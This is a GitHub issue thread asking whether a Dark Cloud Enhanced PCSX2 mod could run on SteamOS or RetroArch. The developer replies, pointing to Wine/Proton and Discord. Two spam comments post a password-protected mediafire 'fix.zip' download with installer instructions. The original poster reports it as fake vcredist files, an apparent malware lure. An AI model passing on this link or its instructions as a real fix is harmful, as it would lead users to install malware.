### ISSUE TITLE
Any Possibility of RetroArch/SteamOS Support?

### ISSUE THREAD

**Issue by Alaric323** [Gundorada-Workshop/DarkCloud-Enhanced#1]
Hi devs, I know this is a practically obscene request and I don't even know if you're still around.

This mod would be amazing to run on SteamOS somehow, which I recognize would require porting both the partner application to Linux, and any cheat codes utilized by PCSX2 to operate on LPCS2, a slightly modified fork that runs in RetroArch.

I can handle any testing if it helps at all. I have a Lenovo Legion Go running BazziteOS, so it is near identical in practice to a Steam Deck.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alaric323** [comment]
I'm sorry, this doesn't seem legitimate in the context of the mod.  You wouldn't even be able to perform your instructions in SteamOS.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dayuppy** [comment]
I am no longer active in developing the mod further but there have been several users in our Discord who have been able to get PCSX2 and the mod running in an emulated windows environment such as Wine, Proton, or SteamTinkerLaunch on the SteamOS.

I haven't followed the conversations fully but I know there was alot of troubleshooting and things they figured out that they may not have posted fully.

I would suggest searching our Official Discord for previous messages relating to the SteamDeck/SteamOS and try to piece together how they managed to get it working.

https://discord.com/invite/8KcnBjgRHP

As there are alternative methods that exist to get this running already, I do not believe we will ever port directly to SteamOS/Linux/RetroArch.


I wish you luck. Feel free to reach out for further assistance in the Discord. I'm sure somebody will be able to help put the pieces together.

**Comment by Alaric323** [comment]
Yeah, a bunch of spam messages that I reported.  The zips had a bunch of obviously fake vcredist files.  I didn't run anything.

**Comment by Dayuppy** [comment]
> Yeah, a bunch of spam messages that I reported. The zips had a bunch of obviously fake vcredist files. I didn't run anything.

Thank you. I am checking to see if there are any additional rules we can set to prevent or at least limit this in the future. I'm going to re-lock and close this issue for now. Feel free to message me on discord or via email linked to my GitHub profile.
